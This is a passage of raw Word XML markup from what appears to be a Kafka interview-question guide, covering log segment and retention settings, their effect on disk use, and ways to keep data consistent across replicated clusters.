          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>splits logs into manageable chunks</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050FC686"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Why this matters:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493FB601"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segments → </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>More frequent segment rolling</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Faster cleanup</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> during retention.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C362E77"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r segments → Fewer files, but </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>slower deletion</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> because Kafka only deletes entire segments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A14680"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3AF52">
          <v:rect id="_x0000_i3542" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="071A69F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129"/>
      </w:tblGrid>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="23AAD1D8" w14:textId="77777777" w:rsidTr="00B33140">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B606E9E"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5D807239"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Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="58626D54" w14:textId="77777777" w:rsidTr="00B33140">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B411CD7"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3BFC47F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ffects </w:t>
            </w:r>
            <w:r w:rsidRPr="004269A3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>I/O oper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gment scanning speed</w:t>
            </w:r>
            <w:r w:rsidRPr="004269A3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> during retention checks. Too small → Too many files. Too large → Slower retention cleanup.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="78EC4AEA" w14:textId="77777777" w:rsidTr="00B33140">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5309271A"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="212DE66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trols </w:t>
            </w:r>
            <w:r w:rsidRPr="004269A3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>how long data remains available</w:t>
            </w:r>
            <w:r w:rsidRPr="004269A3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> for consumers. Longer retention = more data = more disk I/O and storage. Shorter retention = faster cleanup, but less fault tolerance.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1C02E2E1"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9998E">
          <v:rect id="_x0000_i3543" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C68C8F"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Impact on Disk Space</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0B13FB"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 log.retention.ms or log.retention.bytes → Kafka stores more data → </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>More disk usage</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0A4958"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values → Messages get deleted sooner → </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Less disk usage</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, but </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>less available historical data</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAC818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Disk pressure can also lead to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF2A3C3"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crashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298149C1"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der-replicated partitions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF749C0"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errors (e.g., NOT_ENOUGH_REPLICAS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD54662"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4C258">
          <v:rect id="_x0000_i3544" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF9EC34"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Best Practices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE74F1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une log.retention.ms based on </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>business needs</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., audit trails, replay window).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D335F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smaller log.segment.bytes</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> if you want </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>finer-grained retention control</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCB5A78"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onitor disk usage and </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>alert when partitions grow large</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275A777A" w14:textId="77777777" w:rsidR="00B33140" w:rsidRPr="00CE4B95" w:rsidRDefault="00B33140" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1724"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Use tools like </w:t>
      </w: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monitor retention impact.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A72F34B" w14:textId="76CA7F9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821C">
          <v:rect id="_x0000_i3545" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EC7790" w14:textId="06263991" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="00E5098E" w:rsidP="00DB22BB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="877" w:name="_Toc197868091"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How do you ensure Kafka data consistency across distributed clusters</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="877"/>
    </w:p>
    <w:p w14:paraId="02470684" w14:textId="2FFB7503" w:rsidR="00DF5B7A" w:rsidRPr="004269A3" w:rsidRDefault="00DF5B7A"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Kafka data consistency across distributed clusters</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is crucial when implementing </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>multi-cluster or geo-replicated Kafka architectures</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Here’s how you can ensure consistency effectively:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D1B6EA"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EDB6E">
          <v:rect id="_x0000_i3546" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D631B5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Kafka MirrorMaker or MirrorMaker 2 (MM2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1D55A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266B377E"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7A3C981D"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replication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A48B59"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data replication</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from source to target cluster </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>with offset and topic metadata</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20827DB8"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tracks consumer offsets and </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>preserves topic partitioning</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491DD203"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replicate topics from one Kafka cluster (e.g., US) to another (e.g., Europe) reliably using MM2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180E9E16"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4DF2E">
          <v:rect id="_x0000_i3547" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D37DD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nfluent Replicator (Enterprise)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638EB43C"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advanced features like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A53E8E"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hema Registry replication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025DC8D9"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replication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EED8AA"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L replication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFAD590"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etter suited for </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>critical financial or regulatory use cases</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DFE40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2C7D8">
          <v:rect id="_x0000_i3548" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3CD8E9"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355A24BB"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idempotence=true in Kafka producer config.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3FFBB7"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w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>duplicate messages</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> due to retries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A876E4"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ssential in multi-cluster where network issues can lead to re-sends.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E5F9B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898507">
          <v:rect id="_x0000_i3549" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="35AAE3F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nsure Exactly-Once Semantics (EOS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F82A9B"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consistent data processing, enable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06877F2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nable.idempotence=true</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (on producers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17251AE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acks=all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058540A6"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ransactions API</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (to group multiple records or operations as a unit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640DCD09"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messages are </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>committed once and only once</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, even across distributed clusters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007FBCF9"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15C66">
          <v:rect id="_x0000_i3550" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8142BF"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Consistent Topic Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEA6C42"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same topic names, partitions, and configurations</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> across clusters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2848013C"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lps avoid schema mismatches and consumption issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D642BC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27C76">
          <v:rect id="_x0000_i3551" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F0F22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Time Synchronization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548668C1"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all Kafka brokers across clusters use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Network Time Protocol).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436DA2DB"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issues in </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>timestamp-based message ordering or retention policies</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DD2E5F"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6D98AE">
          <v:rect id="_x0000_i3552" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7048DE7B"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Schema Registry Replication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368C0B25"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s Multi-Region Schema Registry</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or replicate schemas manually.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35946B06"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s producers and consumers in both clusters interpret message formats identically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DAA431"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70E92">
          <v:rect id="_x0000_i3553" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D9AB90"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Handle Consumer Offset Replication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0097A342"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replicates offsets using </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>__consumer_offsets</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
